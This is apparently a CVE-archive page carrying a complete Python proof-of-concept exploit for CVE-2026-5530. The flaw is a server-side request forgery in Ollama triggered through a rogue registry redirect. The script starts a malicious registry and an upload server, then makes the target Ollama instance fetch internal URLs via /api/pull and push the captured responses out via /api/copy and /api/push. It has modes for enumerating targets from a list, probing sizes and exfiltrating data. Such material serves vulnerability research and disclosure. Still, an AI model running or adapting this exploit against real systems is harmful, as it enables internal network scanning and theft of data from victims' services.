5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-5530 - Ollama SSRF via Registry Redirect + Exfiltration

  python3 poc.py targets.txt --registry-host host.docker.internal          # enum
  python3 poc.py URL --exfil --size 960 --registry-host host.docker.internal  # exfil
  python3 poc.py URL --probe --registry-host host.docker.internal             # probe + exfil

Author: David Rochester
"""

import argparse, hashlib, json, os, sys, threading, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import Request, urlopen

declared_size = 256
current_target = None
exfil_blobs = []
any_exfil = False
exfil_port = 10000
pull_counter = int(time.time())
registry_host = "127.0.0.1"

def make_digest():
    return "sha256:" + hashlib.sha256(str(pull_counter).encode()).hexdigest()

def make_manifest():
    d = make_digest()
    m = json.dumps({"schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                   "digest": d, "size": 1},
        "layers": [{"mediaType": "application/vnd.ollama.image.model",
                    "digest": d, "size": 1}]}).encode()
    return m, d


class Rogue(BaseHTTPRequestHandler):
    def do_GET(self): self._r("GET")
    def do_HEAD(self): self._r("HEAD")
    def _r(self, m):
        p = self.path.split("?")[0]
        manifest, digest = make_manifest()
        if p in ("/v2", "/v2/"):
            self.send_response(200)
            self.send_header("Docker-Distribution-API-Version", "registry/2.0")
            self.end_headers()
        elif "/manifests/" in p:
            self.send_response(200)
            self.send_header("Content-Type", "application/vnd.docker.distribution.manifest.v2+json")
            self.send_header("Docker-Content-Digest", digest)
            self.send_header("Content-Length", str(len(manifest)))
            self.end_headers()
            if m == "GET": self.wfile.write(manifest)
        elif "/blobs/" in p:
            if m == "HEAD":
                self.send_response(200)
                self.send_header("Content-Length", str(declared_size))
                self.end_headers()
            else:
                if any_exfil: print(f"  [SSRF] -> {current_target}", flush=True)
                self.send_response(307)
                self.send_header("Location", current_target)
                self.send_header("Content-Length", "0")
                self.end_headers()
        else:
            self.send_response(404); self.end_headers()
    def log_message(self, *a): pass


class Exfil(BaseHTTPRequestHandler):
    bufs = {}
    def do_GET(self):
        if self.path.split("?")[0] in ("/v2", "/v2/"):
            self.send_response(200)
            self.send_header("Docker-Distribution-API-Version", "registry/2.0")
            self.end_headers()
        else:
            self.send_response(404); self.end_headers()
    def do_HEAD(self):
        self.send_response(404); self.end_headers()
    def do_POST(self):
        if "/blobs/uploads" in self.path:
            uid = str(time.time_ns())
            self.__class__.bufs[uid] = b""
            host = self.headers.get("Host", f"{registry_host}:{exfil_port}")
            self.send_response(202)
            self.send_header("Location", f"http://{host}/v2/library/pwn/blobs/uploads/{uid}")
            self.send_header("Docker-Upload-UUID", uid)
            self.send_header("Range", "0-0")
            self.end_headers()
        else:
            self.send_response(404); self.end_headers()
    def do_PATCH(self):
        uid = self.path.rstrip("/").split("/")[-1].split("?")[0]
        cl = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(cl) if cl else b""
        if uid in self.__class__.bufs: self.__class__.bufs[uid] += data
        host = self.headers.get("Host", f"{registry_host}:{exfil_port}")
        self.send_response(202)
        self.send_header("Location", f"http://{host}{self.path}")
        self.send_header("Range", f"0-{len(self.__class__.bufs.get(uid, b''))}")
        self.end_headers()
    def do_PUT(self):
        if "/blobs/uploads/" in self.path:
            uid = self.path.split("/blobs/uploads/")[-1].split("?")[0]
            cl = int(self.headers.get("Content-Length", 0))
            data = self.rfile.read(cl) if cl else b""
            buf = self.__class__.bufs.pop(uid, b"") + data
            if buf:
                exfil_blobs.append(buf)
                print(f"\n  [EXFIL] {len(buf)} bytes:")
                print(buf.decode("utf-8", errors="replace")[:4096])
                print(flush=True)
            self.send_response(201)
            self.send_header("Docker-Content-Digest", "sha256:" + hashlib.sha256(buf).hexdigest())
            self.end_headers()
        elif "/manifests/" in self.path:
            cl = int(self.headers.get("Content-Length", 0))
            self.rfile.read(cl)
            self.send_response(201)
            self.send_header("Docker-Content-Digest", make_digest())
            self.end_headers()
        else:
            self.send_response(404); self.end_headers()
    def log_message(self, *a): pass


def pull(api, port):
    model = f"http://{registry_host}:{port}/library/pwn:latest"
    try:
        urlopen(Request(f"{api}/api/pull",
            data=json.dumps({"model": model, "insecure": True, "stream": False}).encode(),
            headers={"Content-Type": "application/json"}), timeout=8)
        return True
    except Exception:
        return False


def exfiltrate(api, port):
    model = f"http://{registry_host}:{port}/library/pwn:latest"
    exfil_model = f"http://{registry_host}:{exfil_port}/library/pwn:latest"
    try:
        urlopen(Request(f"{api}/api/copy",
            data=json.dumps({"source": model, "destination": exfil_model}).encode(),
            headers={"Content-Type": "application/json"}), timeout=10)
        urlopen(Request(f"{api}/api/push",
            data=json.dumps({"model": exfil_model, "insecure": True, "stream": False}).encode(),
            headers={"Content-Type": "application/json"}), timeout=60)
    except Exception as e:
        print(f"  [-] exfil failed: {e}", flush=True)


def probe(api, port, lo=1, hi=4096, thresh=5.0):
    global declared_size, pull_counter
    print(f"  [PROBE] binary search [{lo}, {hi}]")
    while lo < hi:
        mid = (lo + hi + 1) // 2
        declared_size = mid
        pull_counter += 1
        start = time.time()
        pull(api, port)
        elapsed = time.time() - start
        tag = "BIG" if elapsed >= thresh else "OK"
        print(f"  [PROBE] CL={mid:<6} {elapsed:.1f}s [{tag}]", flush=True)
        if elapsed >= thresh: hi = mid - 1
        else: lo = mid
    declared_size = lo
    print(f"  [PROBE] size={lo}\n")
    return lo


def load_targets(arg):
    if os.path.isfile(arg):
        with open(arg) as f:
            return [l.strip() for l in f if l.strip() and not l.startswith("#")]
    return [arg]


def main():
    global current_target, declared_size, pull_counter, exfil_port, registry_host
    ap = argparse.ArgumentParser(description="CVE-2026-5530 PoC")
    ap.add_argument("target", help="URL or file with URLs")
    ap.add_argument("-p", "--port", type=int, default=9999)
    ap.add_argument("--exfil-port", type=int, default=10000)
    ap.add_argument("--exfil", action="store_true", help="exfil with known --size")
    ap.add_argument("--probe", action="store_true", help="binary search for size, then exfil")
    ap.add_argument("--size", type=int, default=None, help="Content-Length (use with --exfil)")
    ap.add_argument("--registry-host", default="127.0.0.1",
                    help="hostname Ollama uses to reach this machine (default: 127.0.0.1)")
    ap.add_argument("--ollama", default="http://127.0.0.1:11434")
    args = ap.parse_args()

    if args.exfil and not args.size:
        print("  --exfil requires --size"); sys.exit(1)

    targets = load_targets(args.target)
    if not targets: print("no targets"); sys.exit(1)
    registry_host = args.registry_host
    exfil_port = args.exfil_port
    if args.size: declared_size = args.size

    # start rogue registry
    rogue = HTTPServer(("0.0.0.0", args.port), Rogue)
    threading.Thread(target=rogue.serve_forever, daemon=True).start()

    if args.exfil or args.probe:
        exfil_srv = HTTPServer(("0.0.0.0", args.exfil_port), Exfil)
        threading.Thread(target=exfil_srv.serve_forever, daemon=True).start()

    global any_exfil
    any_exfil = args.exfil or args.probe
    mode = "probe" if args.probe else "exfil" if args.exfil else "enum"
    print(f"\n  CVE-2026-5530 | {mode} | {len(targets)} targets\n")

    for t in targets:
        current_target = t

        if args.probe:
            print(f"  [*] {t}")
            probe(args.ollama, args.port)
            pull_counter += 1
            ok = pull(args.ollama, args.port)
            if ok:
                print(f"  [+] blob captured, exfiltrating...")
                exfiltrate(args.ollama, args.port)
            else:
                print(f"  [-] pull failed")

        elif args.exfil:
            print(f"  [*] {t}")
            pull_counter += 1
            ok = pull(args.ollama, args.port)
            if ok:
                print(f"  [+] blob captured, exfiltrating...")
                exfiltrate(args.ollama, args.port)
            else:
                print(f"  [-] pull failed")

        else:
            pull_counter += 1
            declared_size = 1
            start = time.time()
            ok = pull(args.ollama, args.port)
            elapsed = time.time() - start
            status = "ALIVE" if ok or elapsed < 5 else "DOWN/FILTERED"
            print(f"  {status}  {elapsed:.1f}s  {t}", flush=True)

    print(f"\n  done. {len(exfil_blobs)} blobs exfiltrated.\n")


if __name__ == "__main__":
    main()